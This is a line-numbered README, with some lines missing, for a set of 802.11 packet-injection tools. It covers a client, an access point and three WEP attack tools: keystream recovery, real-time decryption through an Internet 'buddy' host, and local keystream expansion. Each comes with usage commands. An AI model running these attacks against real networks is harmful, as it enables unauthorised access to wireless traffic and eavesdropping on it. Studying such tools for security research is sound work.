3 This is a collection of tools that use raw 802.11 packet injection.
4 None of the tools configure the interface, so be sure to run something
7 ifconfig wlan create wlandev ath0 wlanmode ahdemo channel 7 promisc up
9 beforehand. The following tools are found here:
12 ap A wifi access point.
14 prga Gives ability to transmit on a WEP network.
15 redir Gives ability to decrypt in real-time on a WEP network, via Internet.
16 expand Gives ability to decrypt locally on a WEP network.
18 All these tools depend on:
20 libw00t Utility functions used by all tools.
22 Detailed explanation of tools.
23 ==============================
27 Acts as a wifi client. It will associate to a network and bind a
28 tap interface to it. The interface may be used like a standard eth
29 interface attached to a normal LAN. Multiple instances of the
30 program may be run in order to connect to multiple APs simultaneously.
33 ./assoc -s w00t -t tap0
34 ifconfig tap0 192.168.0.123 up
39 The same as assoc, but acts as an access point. Example:
42 ifconfig tap1 192.168.0.1 up
45 [For the next set of tools, refer to http://tapir.cs.ucl.ac.uk/bittau-wep.pdf
46 for theoretical information.]
50 Sniff a packet on a WEP network and obtain a keystream. It binds
51 to a tap interface which may be used to TX packets on that network.
54 ./prga -b bssid_of_network -t tap0
55 ifconfig tap0 192.168.0.123 up
60 Resend WEP packets to our buddy on the Internet. The buddy will
61 receive the clear-text and send it back to us via a UDP socket.
62 This data is then fed back into a tap interface. This way, data
63 may be ultimately be read from the tab iface in clear-text. Example:
65 [Box on Internet]~# ./buddy
66 ./redir -d buddy_ip -b bssid -t tap0 -r wifi_rtr_mac -s wifi_src_ip -p 666
72 Sniff a WEP packet and do the linear keystream expansion trick to
73 decrypt it. The clear-text packet is sent to a tap interface.
76 ./expand -b bssid -t tap0